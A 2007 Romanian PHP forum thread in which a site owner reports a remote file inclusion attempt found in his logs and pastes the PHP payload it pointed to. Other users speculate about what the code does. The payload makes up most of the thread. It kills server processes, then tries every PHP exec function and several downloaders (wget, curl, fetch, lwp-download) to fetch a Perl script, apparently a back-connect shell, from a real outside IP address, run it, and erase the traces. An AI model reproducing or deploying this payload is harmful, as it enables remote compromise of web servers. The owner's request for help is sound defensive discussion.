 |
Forum PHP Romania - Discutii despre PHP, MySQL, Javascript, AJAX, etc
Comunitatea PHP Romania
|
| Subiectul anterior :: Subiectul următor |
| Autor |
Mesaj |
Ion
Data înscrierii: 23/Oct/2004
Mesaje: 47
Locație: Ploiesti
|
| Trimis: Dum Sep 02, 2007 4:52 pm Titlul subiectului: hacking - nu-mi dau seama ce a vrut sa faca... |
|
|
In fisierul text unde scriu log-urile de pe un site de-al meu, am gasit urmatoarea chestie (introdusa de la 87.242.98.48 >>> un rus, bineinteles): www.site.ro?id=http://www.teammolitor.lu/.,/cat?
M-am dus acolo si am gasit urmatorul cod:
Cod:
<?
echo " BYY xeQter ";
$xeQted = "$HTTP_HOST$REQUEST_URI\n\n";
$File = "/tmp/sess_e00dd4lbo2ad2758n9fc641e47cd76x9";
$Handle = fopen($File, 'w');
$Data = $xeQted;
fwrite($Handle, $Data);
fclose($Handle);
exec('killall -9 eggdrop bnc mech php inetd');
shell_exec('killall -9 eggdrop bnc mech php inetd');
system('killall -9 eggdrop bnc mech php inetd');
passthru('killall -9 eggdrop bnc mech php inetd');
shell_exec('cd /tmp ; wget http://65.38.95.240/squirrelmail-1.4.2/class/xeqt/bc.txt ; perl bc.txt ; rm -rf bc.txt ; rm -rf bc.txt*');
shell_exec('cd /tmp ; curl -O http://65.38.95.240/squirrelmail-1.4.2/class/xeqt/bc.txt ; perl bc.txt ; rm -rfbc.txt ; rm -rf bc.txt*');
shell_exec('cd /tmp ; GET http://65.38.95.240/squirrelmail-1.4.2/class/xeqt/bc.txt > bc.txt ; perl bc.txt ; rm -rf bc.txt ; rm -rf bc.txt*');
shell_exec('cd /tmp ; fetch http://65.38.95.240/squirrelmail-1.4.2/class/xeqt/bc.txt > bc.txt ; perl bc.txt ;rm -rf bc.txt ; rm -rf bc.txt*');
shell_exec('cd /tmp ; lwp-download http://65.38.95.240/squirrelmail-1.4.2/class/xeqt/bc.txt ; perl bc.txt ; rm -rf bc.txt ; rm -rf bc.txt*');
exec('cd /tmp ; wget http://65.38.95.240/squirrelmail-1.4.2/class/xeqt/bc.txt ; perl bc.txt ; rm -rf bc.txt ;rm -rf bc.txt*');
exec('cd /tmp ; curl -O http://65.38.95.240/squirrelmail-1.4.2/class/xeqt/bc.txt ; perl bc.txt ; rm -rf bc.txt ; rm -rf bc.txt*');
exec('cd /tmp ; GET http://65.38.95.240/squirrelmail-1.4.2/class/xeqt/bc.txt > bc.txt ; perl bc.txt ; rm -rf bc.txt ; rm -rf bc.txt*');
exec('cd /tmp ; fetch http://65.38.95.240/squirrelmail-1.4.2/class/xeqt/bc.txt > bc.txt ; perl bc.txt ; rm -rf bc.txt ; rm -rf bc.txt*');
exec('cd /tmp ; lwp-download http://65.38.95.240/squirrelmail-1.4.2/class/xeqt/bc.txt ; perl bc.txt ; rm -rf bc.txt ; rm -rf bc.txt*');
system('cd /tmp ; wget http://65.38.95.240/squirrelmail-1.4.2/class/xeqt/bc.txt ; perl bc.txt ; rm -rf bc.txt ; rm -rf bc.txt*');
system('cd /tmp ; curl -O http://65.38.95.240/squirrelmail-1.4.2/class/xeqt/bc.txt ; perl bc.txt ; rm -rf bc.txt ; rm -rf bc.txt*');
system('cd /tmp ; GET http://65.38.95.240/squirrelmail-1.4.2/class/xeqt/bc.txt > bc.txt ; perl bc.txt ; rm -rf bc.txt ; rm -rf bc.txt*');
system('cd /tmp ; fetch http://65.38.95.240/squirrelmail-1.4.2/class/xeqt/bc.txt > bc.txt ; perl bc.txt ; rm -rf bc.txt ; rm -rf bc.txt*');
system('cd /tmp ; lwp-download http://65.38.95.240/squirrelmail-1.4.2/class/xeqt/bc.txt ; perl bc.txt ; rm -rf bc.txt ; rm -rf bc.txt*');
passthru('cd /tmp ; wget http://65.38.95.240/squirrelmail-1.4.2/class/xeqt/bc.txt ; perl bc.txt ; rm -rf bc.txt ; rm -rf bc.txt*');
passthru('cd /tmp ; curl -O http://65.38.95.240/squirrelmail-1.4.2/class/xeqt/bc.txt ; perl bc.txt ; rm -rf bc.txt ; rm -rf bc.txt*');
passthru('cd /tmp ; GET http://65.38.95.240/squirrelmail-1.4.2/class/xeqt/bc.txt > bc.txt ; perl bc.txt ; rm -rf bc.txt ; rm -rf bc.txt*');
passthru('cd /tmp ; fetch http://65.38.95.240/squirrelmail-1.4.2/class/xeqt/bc.txt > bc.txt ; perl bc.txt ; rm -rf bc.txt ; rm -rf bc.txt*');
passthru('cd /tmp ; lwp-download http://65.38.95.240/squirrelmail-1.4.2/class/xeqt/bc.txt ; perl bc.txt ; rm -rf bc.txt ; rm -rf bc.txt*');;
shell_exec('cd /tmp ; rm -rf bot 2.6 ; cd /dev/shm ; rm -rf bot 2.6');
system('cd /tmp ; rm -rf bot 2.6 ; cd /dev/shm ; rm -rf bot 2.6');
passthru('cd /tmp ; rm -rf bot 2.6 ; cd /dev/shm ; rm -rf bot 2.6');
exec('cd /tmp ; rm -rf bot 2.6 ; cd /dev/shm ; rm -rf bot 2.6');
sleep(10);
unlink($File);
?>
Eu filtrez id-ul (trebuia sa fie numeric, daca nu, am un exit() ), credeti ca a reusit sa faca ceva? |
|
| Sus |
|
dannezu
Data înscrierii: 06/Iun/2007
Mesaje: 59
|
| Trimis: Dum Sep 02, 2007 7:55 pm Titlul subiectului: :) |
|
|
| face spam trimite emailuri. |
|
| Sus |
|
UnTip
Data înscrierii: 03/Mai/2007
Mesaje: 377
|
| Trimis: Mar Sep 04, 2007 3:28 pm Titlul subiectului: |
|
|
| pai omul incerca sa iti descarce ceva pe serverul tau si sa iti execute cu drepturi 777 in /tmp, asta in caz ca aveai linux pe serverul care iti gazduieste blog-ul sau... in caz ca era serverul tau, ca daca e ceva gen blogspot.com au ei grija sa faca verificarile respective... rm -rf * iti sterge tot fara notificare inclusiv directoare si subdirectoare ce nu erau goale sau ceva de genul |
|
| Sus |
|
PHPRomania Bot
Bot Member
Data înscrierii: 27/Dec/2007
Mesaje: 1
Locaţie: Server Google |
| Trimis: Mie Dec 26, 2007 7:01 pm Titlul subiectului: Ad |
|
|
|
|
|
| Sus |
|
| |
|